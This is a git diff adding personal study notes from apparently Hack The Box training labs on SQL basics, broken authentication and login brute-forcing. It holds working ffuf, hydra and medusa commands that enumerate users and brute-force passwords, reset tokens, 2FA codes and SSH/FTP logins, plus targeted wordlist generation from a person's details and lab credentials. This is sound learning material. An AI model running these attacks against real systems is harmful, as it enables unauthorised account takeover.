Migrate Markdown-Notes: projects, meetings, reference, personal

reference/security/HTB SQL Injection Fundamentals.md

@@ -0,0 +1,24 @@
+# HTB SQL Injection Fundamentals
+
+## intro to mysql
+
+
+djelly@htb[/htb]$ mysql -u root -h docker.hackthebox.eu -P 3306 --skip-ssl -p 
+
+mysql> CREATE DATABASE users;
+or
+mysql> SHOW DATABASES;
+
+mysql> USE users;
+
+mysql> CREATE TABLE logins (
+    ->     id INT,
+    ->     username VARCHAR(100),
+    ->     password VARCHAR(100),
+    ->     date_of_joining DATETIME
+    ->     );
+
+SHOW DATABASES;
+mysql> SHOW TABLES;
+
+mysql> DESCRIBE <table_name>;

reference/security/Password Attacks.md

@@ -0,0 +1,5 @@
+# Password Attacks
+
+## John The Ripper
+
+john --format=<hash_type> <hash or hash_file>

reference/security/htb_broken_ authentication.md

@@ -0,0 +1,58 @@
+# Broken Authentication
+
+## Enumerating Users
+
+ffuf -w /opt/useful/seclists/Usernames/xato-net-10-million-usernames.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"
+
+94.237.59.119:54491
+
+ffuf -w /opt/useful/seclists/Usernames/xato-net-10-million-usernames.txt -u http://94.237.59.119:54491/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"
+
+## Brute-Forcing Passwords
+
+grep '[[:upper:]]' /usr/share/wordlists/rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '.{10}' > custom_wordlist.txt
+
+94.237.55.98:31173
+ffuf -w ./custom_wordlist.txt -u http://94.237.55.98:31173/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=admin&password=FUZZ" -fr "Invalid username"
+
+## Brute-Forcing Password Reset Token
+
+seq -w 0 9999 > tokens.txt
+
+ffuf -w ./tokens.txt -u http://94.237.60.154:47607/reset_password.php?token=FUZZ -fr "The provided token is invalid"
+
+## Brute-Forcing 2fa codes
+
+ffuf -w ./tokens.txt -u http://94.237.62.147:47987/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=gnpl9fatno1bhbegjdirvk70p4" -d "otp=FUZZ" -fr "Invalid 2FA Code
+
+### Authentication Bypass via Parameter Modification
+
+seq -w 0 999 > user_ids.txt
+
+ffuf -w ./user_ids.txt -u http://94.237.51.81:46189/admin.php?user_id=FUZZ -fr "Could not load admin data"
+
+
+75736572 3d 6874622d7374646e743b726f6c653d 75736572
+75736572 3d 6874622d7374646e743b726f6c653d 75736572
+
+### assessemtn
+
+created user
+
+test q97hjg2khvl28mucpu7r8h6kb8
+admin q97hjg2khvl28mucpu7r8h6kb8
+root q97hjg2khvl28mucpu7r8h6kb8
+
+atleast 12 characters no special, atlease 1 number, lower, and upper
+0123456789aB
+
+
+
+
+ffuf -w ./xato-net-10-million-usernames.txt -u http://94.237.62.166:45749/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown username or password"
+
+username is gladys
+password is dWinaldasD13
+
+ffuf -w tokens.txt -u http://94.237.63.109:42328/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=f782dbv49aq0fb6o0iutruripj" -d "otp=FUZZ" -fr "Invalid OTP"
+Test0123456789

reference/security/htb_login_brute_forcing.md

@@ -0,0 +1,75 @@
+# HTB Login Brute Forcing
+
+## Login Forms
+
+
+### Hydra
+
+hydra basic auth
+hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt 127.0.0.1 http-get / -s 81
+
+can use hydra to crack passcodes in the login:
+
+djelly@htb[/htb]$ hydra [options] target http-post-form "path:params:condition_string"
+
+
+I can look for a fail condition like:
+hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid credentials"
+
+Or a success conditions:
+
+- hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=302" # looking for a redirect
+
+- hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=Dashboard" # looking for "Dashboard"
+
+
+### Exercise
+
+curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/top-usernames-shortlist.txt
+
+curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2023-200_most_used_passwords.txt
+
+hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f {Replace with ip} -s {replace with port} http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"
+
+
+hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 83.136.251.254 -s 34996 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"
+
+
+## Medusa
+
+medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M ssh
+
+medusa -h <IP> -n <PORT> -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3
+
+medusa -h 94.237.59.119 -n 39693 -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3
+
+
+## Custom Wordlists
+
+create likely usernames from a persons name:
+git clone https://github.com/urbanadventurer/username-anarchy.git
+./username-anarchy Jane Smith > jane_smith_usernames.txt
+
+`cupp -i`
+cupp in interactive mode will create lots of passwords from a persons life.
+
+hydra -L usernames.txt -P jane-filtered.txt IP -s PORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"
+
+:
+hydra -L jane_smith_usernames.txt -P jane-filtered.txt 94.237.60.154 -s 46018 -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"
+
+
+## Skill assessment1
+
+:56383
+hydra -L usernames.txt -P passwords.txt 94.237.50.94 http-get / -s 56383
+[56383][http-get] host: 94.237.50.94   login: admin   password: Admin123
+
+## Skill assess2
+
+83.136.250.158:39972
+hydra -L usernames.txt -P passwords.txt -s 38376 -V 94.237.50.94 ftp
+
+hydra -l satwossh -P passwords.txt -s 39972 -V 83.136.250.158 ssh -t 4 
+
+medusa -M ssh -h 83.136.250.158  -u root -P passwords.txt -n 39972  -t 4